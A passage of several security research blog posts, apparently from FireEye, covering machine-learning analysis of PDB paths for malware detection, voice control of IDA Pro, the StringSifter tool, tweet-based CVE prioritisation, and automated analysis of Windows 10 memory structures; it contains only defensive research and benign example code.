We fed our featurized training set into a Decision Tree, having set a couple ‘hyperparameters’ such as max depth and minimum samples per leaf, etc. We were also able to use a sliding scale of these hyperparameters to dynamically create trees and, essentially, see what shook out. Examining a trained decision tree such as the one in Figure 6 allowed us to immediately build new signatures.

Figure 6: Example decision tree and decision paths

We found several other interesting tidbits within our decision trees. Some terms that resulted in completely or almost-completely malicious subgroups are:

Directory Term	Example Hashes
\poe\	a6b2aa2b489fb481c3cd9eab2f4f4f5c 92904dc99938352525492cd5133b9917 444be936b44cc6bd0cd5d0c88268fa77
\xampp\	4d093061c172b32bf8bef03ac44515ae 4e6c2d60873f644ef5e06a17d85ec777 52d2a08223d0b5cc300f067219021c90
\temporary projects\	a785bd1eb2a8495a93a2f348c9a8ca67 c43c79812d49ca0f3b4da5aca3745090 e540076f48d7069bacb6d607f2d389d9
\stub\	5ea538dfc64e28ad8c4063573a46800c adf27ce5e67d770321daf90be6f4d895 c6e23da146a6fa2956c3dd7a9314fc97

We also found the term ‘WindowsApplication1’ to be quite useful. 89% of the files in our dataset containing this directory were malicious. Cursory research indicates that this is the default directory generated when using Visual Studio to compile a Windows binary. Once again, this makes some intuitive sense for finding malware authors. Training and evaluating decision trees with various parameters turned out to be a hugely productive exercise in discovering potential new signature terms and logic.
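
A figure like the 89% above is the malicious share of the subgroup a single-term split produces. The sketch below computes that share for every term in a labeled dataset; the sample data and function name are hypothetical, and this is a simplification of what a trained decision tree reports at its leaves.

```python
from collections import defaultdict

def term_purity(samples, min_support=1):
    """Share of malicious files among the files containing each term.

    samples: iterable of (terms, is_malicious) tuples.
    min_support: ignore terms seen in fewer than this many files.
    """
    counts = defaultdict(lambda: [0, 0])  # term -> [malicious, total]
    for terms, is_malicious in samples:
        for term in set(terms):
            counts[term][1] += 1
            if is_malicious:
                counts[term][0] += 1
    return {t: m / n for t, (m, n) in counts.items() if n >= min_support}

# Invented data for illustration only.
samples = [
    (["users", "windowsapplication1"], True),
    (["users", "windowsapplication1"], True),
    (["projects", "windowsapplication1"], True),
    (["src", "windowsapplication1"], False),
    (["src", "retail"], False),
]
print(term_purity(samples, min_support=2))
```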

Classification Accuracy and Findings

Since we now had a large dataset of PDB paths and features, we wanted to see if we could train a traditional classifier to separate good files from bad. Using a Random Forest with some tuning, we were able to achieve an average accuracy of 87% over 10 cross validations. However, while our recall (the percentage of bad things we could identify with the model) was relatively high at 89%, our malware precision (the share of those things we called bad that were actually bad) was far too low, hovering at or below 50%. This indicates that using this model alone for malware detection would result in an unacceptably large number of false positives, were we to deploy it in the wild as a singular detection platform. However, used in conjunction with other tools, this could be a useful weak signal to assist with analysis.
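
To see how high accuracy and recall can coexist with low precision, it helps to compute all three from the same confusion counts. The counts below are invented to roughly mirror the percentages above and are not our actual results; they assume benign files greatly outnumber malicious ones.

```python
def classification_metrics(tp, fp, tn, fn):
    """Accuracy, precision, and recall for the malicious class."""
    return {
        "accuracy": (tp + tn) / (tp + fp + tn + fn),
        "precision": tp / (tp + fp) if tp + fp else 0.0,
        "recall": tp / (tp + fn) if tp + fn else 0.0,
    }

# Hypothetical: 100 malicious and 900 benign files.
metrics = classification_metrics(tp=89, fp=100, tn=800, fn=11)
print(metrics)
```

With few malicious files in the mix, even a modest false positive rate on the benign majority produces more false alarms than true detections, which drags precision down while accuracy stays high.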

Conclusion and Next Steps

While our journey of statistical PDB analysis did not yield a magic malware classifier, it did yield a number of useful findings that we were hoping for:

We developed several file path feature functions which are transferable to other models under development.
By diving into statistical analysis of the dataset, we were able to identify new keywords and logic branches to include in YARA signatures. These signatures have since been deployed and discovered new malware samples.
We answered a number of our own general research questions about PDB paths, and were able to dispel some theories we had not fully tested with data.

While building an independent classifier was not the primary goal, the end model’s accuracy can surely be improved. Generating an even larger, more diverse dataset would likely make the biggest impact on our accuracy, recall, and precision. Further hyperparameter tuning and feature engineering could also help. There is a large amount of established research into text classification using various deep learning methods such as LSTMs, which could be applied effectively to a larger dataset.

PDB paths are only one small family of file paths that we encounter in the field of cyber security. Whether in initial infection, staging, or another part of the attack lifecycle, the file paths found during forensic analysis can reveal incredibly useful information about adversary activity. We look forward to further community research on how to properly extract and represent that information.

IDA, I Think It’s Time You And I Had a Talk: Controlling IDA Pro With Voice Control Software

Threat Research

James T. Bennett

3 October 2019 at 17:00

Introduction

This blog post is the next episode in the FireEye Labs Advanced Reverse Engineering (FLARE) team Script Series. Today, we are sharing something quite unusual. It is not a tool or a virtual machine distribution, nor is it a plugin or script for a popular reverse engineering tool or framework. Rather, it is a profile created for a consumer software application completely unrelated to reverse engineering or malware analysis… until now. The software is named VoiceAttack, and its purpose is to make it easy for users to control other software on their computer using voice commands. With FLARE’s new profile for VoiceAttack, users can completely control IDA Pro with their voice! Have you ever dreamed of telling IDA Pro to decompile a function or show you the strings of a binary? Well dream no more! Not only does our profile give you total control of the software, it also provides shortcuts and other cool features not previously available. It’s our hope that providing voice control for the world’s most popular disassembler will further empower users with repetitive stress injuries or disabilities to more effectively put their reverse engineering skills to use with this new accessibility option as well as helping the community at large work more efficiently.

Check out our video demonstration of some of the features of the profile to see it in action.

How Does It Work?

VoiceAttack is an inexpensive software application that utilizes the Windows Speech Recognition (WSR) feature to enable the creation of user-defined, voice-activated macros. The user specifies a key word or phrase, then defines one or more actions to be taken when that word or phrase is recognized. The most common types of actions to be taken include key presses, mouse movement and clicks, and clipboard manipulation. However, there are many other more advanced features available that provide a lot of flexibility to users including variables, loops, and conditionals. You can even have the computer speak to you in response to your commands! VoiceAttack requires an internet connection, but only during the registration process; afterwards, the network adapter can be disabled or connected to a network that cannot reach the internet, and VoiceAttack will continue to work without issue.

To use VoiceAttack, you must first train Windows Speech Recognition to recognize your voice. Instructions on how to do so can be found here. This process only takes a few minutes at minimum, but the more time you spend training, the better the experience you will have with it.

What Does the IDA Pro Profile Provide?

FLARE’s IDA Pro profile for VoiceAttack maps every advertised keyboard shortcut in IDA Pro to a voice command. Although this is only one part of what the profile provides, many users will find this in itself very useful. When developing this profile, I was shocked to discover just how many keyboard shortcuts there really are for IDA Pro and what can be accomplished with them. Some of my favorite shortcuts are found under the View->Open Subviews and Windows menus. With this profile, I can simply say “show strings” or “show structures” or “show window x” to change the tab I am currently viewing or open a new view in a tab without having to move my mouse cursor anywhere. The next few paragraphs describe some other useful commands to make any reverse engineer’s job easier. For a more detailed description of the profile and commands available, see the Github page.

Macros

A series of voice commands can perform multi-step actions not otherwise reachable by individual keyboard shortcuts. For example, wouldn’t it be nice to have commands to toggle the visibility of opcode bytes (see Figure 1)? Currently, you have to open the Options menu, select the General menu item, input a value in the Number of opcode bytes text field, and click the OK button. Well, now you can simply say “show opcodes” or “hide opcodes” and it will be so!

Figure 1: Configuring the number of opcode bytes to show in IDA Pro's disassembly view

Defining a Unicode string in IDA Pro is a multi-step exercise, whether you navigate to the Edit->Strings menu or use the “string literals” keyboard shortcut Alt+A followed by pressing the U key as shown in Figure 2. Now you can simply say “make Unicode string” and the work is done for you.

Figure 2: String literals dialog in IDA Pro

Reversing a C++ application? The Create struct from selection action is a very helpful feature in this case, but it requires you to navigate to the Edit->Structs menu in order to use it. The voice command “create struct from selection” does this for you automatically. The “look it up” command will copy the currently highlighted token in the disassembly and search Google for it using your default browser. There are several other macros in the profile that are like this and save you a lot of time navigating menus and dialogs to perform simple actions.

Cursor Movement, Dialogs, and Navigation

The cursor movement commands allow the user to move the cursor up, down, left, or right, one or more times, in specified increments. These commands also allow for scrolling with a voice command that commences scrolling in a chosen direction, and another voice command for stopping scrolling. There are even voice commands to set the speed of the scroll to slow, medium, or fast. In the disassembly view, the cursor can also be moved per “word” on the current line of the disassembly or decompilation, or even per basic block or function.

Like many other applications, dialogs are a part of IDA Pro’s user interface. The ability to easily navigate and interact with items in a dialog with your voice is essential to a smooth user experience. Voice commands in the profile enable the user to easily click the OK or Cancel buttons, toggle checkboxes, and tab through controls in the dialog in both directions and in specified increments.

With the aid of a companion IDAPython plugin, additional navigation commands are supported. Commands that allow the user to move the cursor to the beginning or end of the current function, to the next or previous “call” instruction, to the previous or next instruction containing the highlighted token, or to a specified number of bytes forward or backwards from the current cursor position help to make voice-controlled navigation easier.

These cursor movement and navigation commands enable users to have full control of IDA Pro without the use of their hands. While this is true and an important goal for the profile, it is not practical for people who have full use of their hands to go completely hands-free. The commands that navigate the cursor in IDA Pro will never be as fast or easy as simply using the mouse to point and click somewhere on the screen. In any case, users will find themselves building up a collection of voice commands they prefer to use that will depend on personal tastes. However, enabling full voice control allows reverse engineers who do not have full use of their hands to still effectively operate IDA Pro, which we hope will be of great use to the community. Having such a capability is also useful for those who suffer from repetitive strain injury.

Input Recognition

The commands described so far give you control over IDA Pro with your voice, but there is still the matter of providing textual input for items such as function and variable names, comments, and other text input fields. VoiceAttack does provide the ability in macros to enable and disable what is called “Dictation Mode”. When in Dictation Mode, any recognized words are added to a buffer of text until Dictation Mode is disabled. Then this text can be used elsewhere in the macro. Unfortunately, this feature is not designed to recognize the kinds of technical terms one would be using in the context of reverse engineering programs. Even if it were, there is still the issue of having to format the text to be a valid function or variable name. Instead of wrestling with this feature to try to make it work for this purpose, a very large and growing collection of “input recognition” commands was created. These commands are designed to recognize common words used in the names of functions and variables, as well as full function names as found in the C runtime libraries and the Windows APIs. Once recognized, the word or function name is copied to the user’s clipboard and pasted into the text field. To avoid the inadvertent triggering of such commands during the regular operation of IDA Pro, these commands are only active when the “input mode” is enabled. This mode is enabled automatically when certain commands are activated such as “rename” or “find”, and automatically disabled when dialog commands such as “OK” or “cancel” are activated. The input mode can also be manually manipulated with the “input mode on” and “input mode off” commands.

Conclusion

Today, the FLARE team is releasing a profile for VoiceAttack and a companion IDAPython plugin that enables full voice control of IDA Pro along with many added convenience features. The profile contains over 1000 defined commands and growing. It is easy to view, edit, and add commands to this profile to customize it to suit your needs or to improve it for the community at large. The VoiceAttack software is highly affordable and enables you to create profiles for any applications or games that you use. For installation instructions and usage information, see the project’s Github page. Give it a try today!

Open Sourcing StringSifter

Threat Research

Philip Tully

7 September 2019 at 17:00

Malware analysts routinely use the Strings program during static analysis in order to inspect a binary's printable characters. However, identifying relevant strings by hand is time consuming and prone to human error. Larger binaries produce upwards of thousands of strings that can quickly evoke analyst fatigue, relevant strings occur less often than irrelevant ones, and the definition of "relevant" can vary significantly among analysts. Mistakes can lead to missed clues that would have reduced overall time spent performing malware analysis, or even worse, incomplete or incorrect investigatory conclusions.

Earlier this year, the FireEye Data Science (FDS) and FireEye Labs Advanced Reverse Engineering (FLARE) teams published a blog post describing a machine learning model that automatically ranked strings to address these concerns. Today, we publicly release this model as part of StringSifter, a utility that identifies and prioritizes strings according to their relevance for malware analysis.

Goals

StringSifter is built to sit downstream from the Strings program; it takes a list of strings as input and returns those same strings ranked according to their relevance for malware analysis as output. It is intended to make an analyst's life easier, allowing them to focus their attention on only the most relevant strings located towards the top of its predicted output. StringSifter is designed to be seamlessly plugged into a user’s existing malware analysis stack. Once its GitHub repository is cloned and installed locally, it can be conveniently invoked from the command line with its default arguments according to:

strings <sample_of_interest> | rank_strings

We are also providing Docker command line tools for additional portability and usability. For a more detailed overview of how to use StringSifter, including how to specify optional arguments for customizable functionality, please view its README file on GitHub.

We have received great initial internal feedback about StringSifter from FireEye’s reverse engineers, SOC analysts, red teamers, and incident responders. Encouragingly, we have also observed users at the opposite ends of the experience spectrum find the tool to be useful – from beginners detonating their first piece of malware as part of a FireEye training course – to expert malware researchers triaging incoming samples on the front lines. By making StringSifter publicly available, we hope to enable a broad set of personas, use cases, and creative downstream applications. We will also welcome external contributions to help improve the tool’s accuracy and utility in future releases.

Conclusion

We are releasing StringSifter to coincide with our presentation at DerbyCon 2019 on Sept. 7, and we will also be doing a technical dive into the model at the Conference on Applied Machine Learning for Information Security this October. With its release, StringSifter will join FLARE VM, FakeNet, and CommandoVM as one of many recent malware analysis tools that FireEye has chosen to make publicly available. If you are interested in developing data-driven tools that make it easier to find evil and help benefit the security community, please consider joining the FDS or FLARE teams by applying to one of our job openings.

Showing Vulnerability to a Machine: Automated Prioritization of Software Vulnerabilities

Threat Research

Evan Wright

13 August 2019 at 16:45

Introduction

If a software vulnerability can be detected and remedied, then a potential intrusion is prevented. While not all software vulnerabilities are known, 86 percent of vulnerabilities leading to a data breach were patchable, though there is some risk of inadvertent damage when applying software patches. When new vulnerabilities are identified they are published in the Common Vulnerabilities and Exposures (CVE) dictionary by vulnerability databases, such as the National Vulnerability Database (NVD).

The Common Vulnerability Scoring System (CVSS) provides a metric for prioritization that is meant to capture the potential severity of a vulnerability. However, it has been criticized for a lack of timeliness, vulnerable population representation, normalization, rescoring and broader expert consensus that can lead to disagreements. For example, some of the worst exploits have been assigned low CVSS scores. Additionally, CVSS does not measure the vulnerable population size, which many practitioners have stated they expect it to score. The design of the current CVSS system leads to too many severe vulnerabilities, which causes user fatigue.

To provide a more timely and broad approach, we use machine learning to analyze users’ opinions about the severity of vulnerabilities by examining relevant tweets. The model predicts whether users believe a vulnerability is likely to affect a large number of people, or if the vulnerability is less dangerous and unlikely to be exploited. The predictions from our model are then used to score vulnerabilities faster than traditional approaches, like CVSS, while providing a different method for measuring severity, which better reflects real-world impact.

Our work uses nowcasting to address this important gap of prioritizing early-stage CVEs to know if they are urgent or not. Nowcasting is the economic discipline of determining a trend or a trend reversal objectively in real time. In this case, we are recognizing the value of linking social media responses to the release of a CVE after it is released, but before it is scored by CVSS. Scores of CVEs should ideally be available as soon as possible after the CVE is released, while the current process often hampers prioritization of triage events and ultimately slows response to severe vulnerabilities. This crowdsourced approach reflects numerous practitioner observations about the size and widespread nature of the vulnerable population, as shown in Figure 1. For example, in the Mirai botnet incident in 2016 a massive number of vulnerable IoT devices were compromised leading to the largest Denial of Service (DoS) attack on the internet at the time.

Figure 1: Tweet showing social commentary on a vulnerability that reflects severity

Model Overview

Figure 2 illustrates the overall process that starts with analyzing the content of a tweet and concludes with two forecasting evaluations. First, we run Named Entity Recognition (NER) on tweet contents to extract named entities. Second, we use two classifiers to test the relevancy and severity towards the pre-identified entities. Finally, we match the relevant and severe tweets to the corresponding CVE.

Figure 2: Process overview of the steps in our CVE score forecasting

Each tweet is associated to CVEs by inspecting URLs or the contents hosted at a URL. Specifically, we link a CVE to a tweet if it contains a CVE number in the message body, or if the URL content contains a CVE. Each tweet must be associated with a single CVE and must be classified as relevant to security-related topics to be scored. The first forecasting task considers how well our model can predict the CVSS rankings ahead of time. The second task is predicting future exploitation of the vulnerability for a CVE based on Symantec Antivirus Signatures and Exploit DB. The rationale is that eventual presence in these lists indicates not just that exploits can exist or that they do exist, but that they also are publicly available.
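The linking rule above can be sketched as follows. This is a minimal illustration, not the pipeline we ran: the function names are hypothetical, the URL content is assumed to have been fetched already and passed in as text, and the CVE identifiers in the example are placeholders.

```python
import re

# CVE identifiers have the form CVE-<year>-<sequence>, with four or more sequence digits.
CVE_PATTERN = re.compile(r"\bCVE-\d{4}-\d{4,}\b", re.IGNORECASE)


def find_cves(text):
    """Return the set of distinct CVE identifiers mentioned in text, upper-cased."""
    return {match.upper() for match in CVE_PATTERN.findall(text)}


def link_tweet_to_cve(body, url_content=""):
    """Return the single CVE a tweet refers to, or None if there are zero or several."""
    cves = find_cves(body) | find_cves(url_content)
    return next(iter(cves)) if len(cves) == 1 else None


# Placeholder identifiers, for illustration only.
print(link_tweet_to_cve("Patch now: cve-2018-0001 looks nasty"))
print(link_tweet_to_cve("Comparing CVE-2018-0001 and CVE-2018-0002"))
```

Returning None for tweets that mention several CVEs mirrors the requirement that each scored tweet be associated with a single CVE.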

Modeling Approach

Predicting the CVSS scores and exploitability from Twitter data involves multiple steps. First, we need to find appropriate representations (or features) for our natural language to be processed by machine learning models. In this work, we use two natural language processing methods for extracting features from text: (1) n-gram features, and (2) word embeddings. Second, we use these features to predict if the tweet is relevant to the cyber security field using a classification model. Third, we use these features to predict if the relevant tweets are making strong statements indicative of severity. Finally, we match the severe and relevant tweets up to the corresponding CVE.

N-grams are word sequences, such as word pairs for 2-grams or word triples for 3-grams. In other words, they are contiguous sequences of n words from a text. After we extract these n-grams, we can represent the original text as a bag-of-ngrams. Consider the sentence:

A critical vulnerability was found in Linux.

If we consider all 2-gram features, then the bag-of-ngrams representation contains “A critical”, “critical vulnerability”, etc.
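As a minimal sketch of the bag-of-ngrams idea, the following extracts all 2-grams from the example sentence. The whitespace tokenizer and the function name are simplifying assumptions for illustration; a tweet-aware tokenizer would be needed in practice.

```python
from collections import Counter


def ngrams(tokens, n):
    """Return every contiguous run of n tokens, joined with spaces."""
    return [" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1)]


sentence = "A critical vulnerability was found in Linux."
tokens = sentence.rstrip(".").split()  # naive whitespace tokenization

bag_of_bigrams = Counter(ngrams(tokens, 2))
for bigram, count in bag_of_bigrams.items():
    print(count, bigram)
```

The Counter maps each 2-gram to how often it occurs, which is the bag-of-ngrams representation for this one sentence.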

Word embeddings are a way to learn the meaning of a word by how it was used in previous contexts, and then represent that meaning in a vector space. Word embeddings know the meaning of a word by the company it keeps, more formally known as the distributional hypothesis. These word embedding representations are machine friendly, and similar words are often assigned similar representations. Word embeddings are domain specific. In our work, we additionally train terminology specific to cyber security topics; for example, the words related to threats are defenses, cyberrisk, cybersecurity, threat, and iot-based. The embedding would allow a classifier to implicitly combine the knowledge of similar words and the meaning of how concepts differ. Conceptually, word embeddings may help a classifier use these embeddings to implicitly associate relationships such as:

device + infected = zombie

where an entity called device has a mechanism applied called infected (malicious software infecting it) then it becomes a zombie.
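A toy illustration of this kind of vector arithmetic is sketched below. The three-dimensional vectors are invented for the example and are not taken from our trained embeddings, which have many more dimensions and are learned from text.

```python
import math

# Hypothetical 3-dimensional embeddings, hand-made for illustration only.
TOY_VECTORS = {
    "device":   [1.0, 0.0, 0.0],
    "infected": [0.0, 1.0, 0.0],
    "zombie":   [0.9, 0.9, 0.1],
    "server":   [1.0, 0.0, 0.3],
    "patch":    [0.0, -1.0, 0.2],
}


def cosine(a, b):
    """Cosine similarity between two equal-length vectors."""
    dot = sum(x * y for x, y in zip(a, b))
    norm_a = math.sqrt(sum(x * x for x in a))
    norm_b = math.sqrt(sum(y * y for y in b))
    return dot / (norm_a * norm_b)


def nearest(query, exclude):
    """Return the vocabulary word whose vector is most similar to query."""
    candidates = (word for word in TOY_VECTORS if word not in exclude)
    return max(candidates, key=lambda word: cosine(query, TOY_VECTORS[word]))


combined = [d + i for d, i in zip(TOY_VECTORS["device"], TOY_VECTORS["infected"])]
closest_word = nearest(combined, exclude={"device", "infected"})
print(closest_word)
```

With these made-up vectors, the sum of device and infected lies closest to zombie, which is the relationship a classifier could pick up implicitly from real embeddings.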

To address issues where social media tweets differ linguistically from natural language, we leverage previous research and software from the Natural Language Processing (NLP) community. This addresses specific nuances like less consistent capitalization, and stemming to account for a variety of special characters like ‘@’ and ‘#’.

Figure 3: Tweet demonstrating value of identifying named entities in tweets in order to gauge severity

Named Entity Recognition (NER) identifies the words that construct nouns based on their context within a sentence, and benefits from our embeddings incorporating cyber security words. Correctly identifying the nouns using NER is important to how we parse a sentence. In Figure 3, for instance, NER allows Windows 10 to be understood as an entity while October 2018 is treated as a date. Without this ability, the text in Figure 3 may be confused with the physical notion of windows in a building.

Once NER tokens are identified, they are used to test if a vulnerability affects them. In the Windows 10 example, Windows 10 is the entity and the classifier will predict whether the user believes there is a serious vulnerability affecting Windows 10. One prediction is made per entity, even if a tweet contains multiple entities. Filtering tweets that do not contain named entities reduces tweets to only those relevant to expressing observations on a software vulnerability.

From these normalized tweets, we can gain insight into how strongly users are emphasizing the importance of the vulnerability by observing their choice of words. The choice of adjective is instrumental in the classifier capturing the strong opinions. Twitter users often use strong adjectives and superlatives to convey magnitude in a tweet or when stressing the importance of something related to a vulnerability like in Figure 4. This magnitude often indicates to the model when a vulnerability’s exploitation is widespread. Table 1 shows our analysis of important adjectives that tend to indicate a more severe vulnerability.

Figure 4: Tweet showing strong adjective use

Table 1: Log-odds ratios for words correlated with highly-severe CVEs

Finally, the processed features are evaluated with two different classifiers to output scores to predict relevancy and severity. When a named entity is identified all words comprising it are replaced with a single token to prevent the model from biasing toward that entity. The first model uses an n-gram approach where sequences of two, three, and four tokens are input into a logistic regression model. The second approach uses a one-dimensional Convolutional Neural Network (CNN), comprised of an embedding layer, a dropout layer then a fully connected layer, to extract features from the tweets.
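The entity replacement and the two-, three-, and four-token sequences fed to the n-gram model can be sketched as follows. The placeholder token, the function names, and the example tweet are assumptions made for illustration, and the entity span is supplied by hand rather than produced by an NER system.

```python
def mask_entity(tokens, entity, placeholder="<ENTITY>"):
    """Replace each contiguous occurrence of entity (a token list) with one placeholder."""
    masked, i, width = [], 0, len(entity)
    while i < len(tokens):
        if width and tokens[i:i + width] == entity:
            masked.append(placeholder)
            i += width
        else:
            masked.append(tokens[i])
            i += 1
    return masked


def ngram_features(tokens, sizes=(2, 3, 4)):
    """Collect all n-grams of the given sizes as space-joined strings."""
    features = []
    for n in sizes:
        features.extend(" ".join(tokens[i:i + n]) for i in range(len(tokens) - n + 1))
    return features


tokens = "serious flaw found in Windows 10 today".split()
masked = mask_entity(tokens, ["Windows", "10"])
features = ngram_features(masked)
print(masked)
print(features)
```

Because the two tokens of the entity collapse into one placeholder, the resulting features describe what is being said about an entity rather than which entity it is.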

Evaluating Data

To evaluate the performance of our approach, we curated a dataset of 6,000 tweets containing the keywords vulnerability or ddos from Dec 2017 to July 2018. Workers on Amazon’s Mechanical Turk platform were asked to judge whether a user believed a vulnerability they were discussing was severe. For all labeling, multiple users must independently agree on a label, and multiple statistical and expert-oriented techniques are used to eliminate spurious annotations. Five annotators were used for the labels in the relevancy classifier and ten annotators were used for the severity annotation task. Heuristics were used to remove unserious respondents; for example, when users did not agree with other annotators for a majority of the tweets. A subset of tweets were expert-annotated and used to measure the quality of the remaining annotations.

Using the features extracted from tweet contents, including word embeddings and n-grams, we built a model using the annotated data from Amazon Mechanical Turk as labels. First, our model learns if tweets are relevant to a security threat using the annotated data as ground truth. This would remove a statement like “here is how you can #exploit tax loopholes” from being confused with a cyber security-related discussion about a user exploiting a software vulnerability as a malicious tool. Second, a forecasting model scores the vulnerability based on whether annotators perceived the threat to be severe.

CVSS Forecasting Results

Both the relevancy classifier and the severity classifier were applied to various datasets. Data was collected from December 2017 to July 2018. Most notably 1,000 tweets were held-out from the original 6,000 to be used for the relevancy classifier and 466 tweets were held-out for the severity classifier. To measure the performance, we use the Area Under the precision-recall Curve (AUC), which is a correctness score that summarizes the tradeoffs of minimizing the two types of errors (false positive vs false negative), with scores near 1 indicating better performance.

The relevancy classifier scored 0.85
The severity classifier using the CNN scored 0.65
The severity classifier using a Logistic Regression model, without embeddings, scored 0.54

Next, we evaluate how well this approach can be used to forecast CVSS ratings. In this evaluation, all tweets must occur a minimum of five days ahead of CVSS scores. The severity forecast score for a CVE is defined as the maximum severity score among the tweets which are relevant and associated with the CVE. Table 2 shows the results of three models: randomly guessing the severity, modeling based on the volume of tweets covering a CVE, and the ML-based approach described earlier in the post. The scoring metric in Table 2 is precision at top K using our logistic regression model. For example, where K=100, this is a way for us to identify what percent of the 100 most severe vulnerabilities were correctly predicted. The random model would predict 59, while our model predicted 78 of the top 100 and all ten of the most severe vulnerabilities.

Table 2: Comparison of random simulated predictions, a model based just on quantitative features like “likes”, and the results of our model
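The two definitions used in this evaluation, the per-CVE forecast as a maximum over relevant tweets and precision at top K, can be sketched as below. The tweet tuples, scores, and CVE labels are hypothetical placeholders, and the function names are ours for illustration.

```python
def forecast_scores(tweets):
    """Map each CVE to the maximum severity score among its relevant tweets.

    tweets is an iterable of (cve_id, is_relevant, severity_score) tuples.
    """
    scores = {}
    for cve, is_relevant, severity in tweets:
        if is_relevant:
            scores[cve] = max(severity, scores.get(cve, severity))
    return scores


def precision_at_k(forecast, truly_severe, k):
    """Fraction of the k highest-scored CVEs that are in the truly_severe set."""
    top_k = sorted(forecast, key=forecast.get, reverse=True)[:k]
    if not top_k:
        return 0.0
    return sum(1 for cve in top_k if cve in truly_severe) / len(top_k)


# Hypothetical data: placeholder labels instead of real CVE identifiers.
tweets = [
    ("CVE-A", True, 0.9), ("CVE-A", True, 0.4),
    ("CVE-B", True, 0.7), ("CVE-B", False, 0.99),  # irrelevant tweet is ignored
    ("CVE-C", True, 0.2), ("CVE-D", True, 0.8),
]
forecast = forecast_scores(tweets)
print(forecast)
print(precision_at_k(forecast, truly_severe={"CVE-A", "CVE-B"}, k=2))
```

In this toy data the top two forecasts are CVE-A and CVE-D, of which only CVE-A is truly severe, so precision at K=2 is one half.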

Exploit Forecasting Results

We also measured the practical ability of our model to identify the exploitability of a CVE in the wild, since this is one of the motivating factors for tracking. To do this, we collected severe vulnerabilities that have known exploits by their presence in the following data sources:

Symantec Antivirus signatures
Symantec Intrusion Prevention System signatures
ExploitDB catalog

The dataset for exploit forecasting was comprised of 377,468 tweets gathered from January 2016 to November 2017. Of the 1,409 CVEs used in our forecasting evaluation, 134 publicly weaponized vulnerabilities were found across all three data sources.

Using CVEs from the aforementioned sources as ground truth, we find our CVE classification model is more predictive of detecting operationalized exploits from the vulnerabilities than CVSS. Table 3 shows precision scores illustrating seven of the top ten most severe CVEs and 21 of the top 100 vulnerabilities were found to have been exploited in the wild. Compare that to one of the top ten and 16 of the top 100 from using the CVSS score itself. The recall scores show the percentage of our 134 weaponized vulnerabilities found in our K examples. In our top ten vulnerabilities, seven were found to be in the 134 (5.2%), while the CVSS scoring’s top ten included only one (0.7%) CVE being exploited.

Table 3: Precision and recall scores for the top 10, 50 and 100 vulnerabilities when comparing CVSS scoring, our simplistic volume model and our NLP model
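As a worked check of the figures quoted above, the short sketch below recomputes precision and recall at K from the hit counts stated in the text. Only the counts come from the post; the helper names are ours.

```python
TOTAL_WEAPONIZED = 134  # publicly weaponized CVEs across the three data sources


def precision_pct(hits, k):
    """Percentage of the top k predictions that were exploited in the wild."""
    return round(100 * hits / k, 1)


def recall_pct(hits, total=TOTAL_WEAPONIZED):
    """Percentage of all weaponized CVEs that appear among the top k predictions."""
    return round(100 * hits / total, 1)


# (label, K, hits) as stated in the text.
for label, k, hits in [("our model", 10, 7), ("our model", 100, 21),
                       ("CVSS", 10, 1), ("CVSS", 100, 16)]:
    print(f"{label:9s} K={k:3d} precision={precision_pct(hits, k)}% recall={recall_pct(hits)}%")
```

Recall stays small at these values of K because even a perfect top ten could cover at most 10 of the 134 weaponized vulnerabilities.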

Conclusion

Preventing vulnerabilities is critical to an organization’s information security posture, as it effectively mitigates some cyber security breaches. In our work, we found that social media content that pre-dates CVE scoring releases can be effectively used by machine learning models to forecast vulnerability scores and prioritize vulnerabilities days before they are made available. Our approach incorporates a novel social sentiment component, which CVE scores do not, and it allows scores to better predict real-world exploitation of vulnerabilities. Finally, our approach allows for a more practical prioritization of software vulnerabilities effectively indicating the few that are likely to be weaponized by attackers. NIST has acknowledged that the current CVSS methodology is insufficient. The current process of scoring CVSS is expected to be replaced by ML-based solutions by October 2019, with limited human involvement. However, there is no indication of utilizing a social component in the scoring effort.

This work was led by researchers at Ohio State under the IARPA CAUSE program, with support from Leidos and FireEye. This work was originally presented at NAACL in June 2019. Our paper describes this work in more detail, and it was also covered by Wired.

Finding Evil in Windows 10 Compressed Memory, Part Three: Automating Undocumented Structure Extraction

Threat Research

Omar Sardar

8 August 2019 at 20:45

This is the final post in the three-part series: Finding Evil in Windows 10 Compressed Memory. In the first post (Volatility and Rekall Tools), the FLARE team introduced updates to both memory forensic toolkits. These updates enabled these open source tools to analyze previously inaccessible compressed data in memory. This research was shared with the community at the 2019 SANS DFIR Austin conference and is available on GitHub (Volatility and Rekall). In the second post (Virtual Store Deep Dive), we looked at the structures and algorithms involved in locating and extracting compressed pages from the Store Manager. The post included a walkthrough of a memory dump designed for analysts to be able to recreate in their own Windows 10 environments. The structures referenced in the walkthrough were all previously analyzed in a disassembler, a manual effort which came in at around eight hours. As you’d expect, this task quickly became a candidate for automation. Our analysis time is now under two minutes!

This final post accompanies my and Dimiter Andonov's BlackHat USA 2019 talk with the series title and seeks to describe the challenges faced in maintaining software that ultimately relies on undocumented structures. Here we introduce a solution to reduce the level of effort of analyzing undocumented structures.

Overview

Undocumented structures within the Windows kernel are always subject to change. The flexibility granted by not publicizing a structure’s composition can be invaluable to a development team. It can allow for the system to grow unencumbered by the need to update helper functions and public documentation. In many cases, even when a publicly available API designed to access the undocumented structures can be leveraged on a live system, incident responders and memory forensic analysts don’t have the luxury of utilizing them. DFIR analysts operating on memory extractions or snapshots must ultimately use tools that recreate the job of an API by manually parsing and traversing structures and reimplementing the algorithms used.

Unfortunately, these structures and algorithms are not always up to date in the analysts’ toolkit, leading to incomplete extractions or completely broken investigations. These tools may cease to work after any given update. This is the case with the Windows kernel’s Store Manager component. Structures relied on to locate compressed data in RAM are constantly evolving. This requires some flexibility built into the plugins and a means of reducing the analysis time required to reconstruct these structures.

Leveraging flare-emu

To ease my Store Manager analysis efforts, I looked into Tom Bennett’s flare-emu utility. flare-emu can be viewed as the marriage of IDA Pro with the Unicorn emulation engine. The original use of the framework was to clean up Objective-C function call names due to ambiguity stemming from the unknown id argument for calls to objc_msgSend. Tom was able to use emulation to resolve the ambiguity and clean up his analysis environment. The value I saw in the framework was that the barrier to entry for using Unicorn was now lowered to a point where it could be used to rapidly prototype ideas. flare-emu handles PE loading, memory faults, and function calls while guaranteeing traversal over code you would like to reach.

After analyzing a dozen Windows 10 kernels, I had become familiar enough with the process to begin automating the effort. The automation of undocumented structures and algorithms requires one or more of the following properties to remain constant across builds.

Structure locations
Function prototypes
Order of structure memory access
Structure field usage
Callstacks

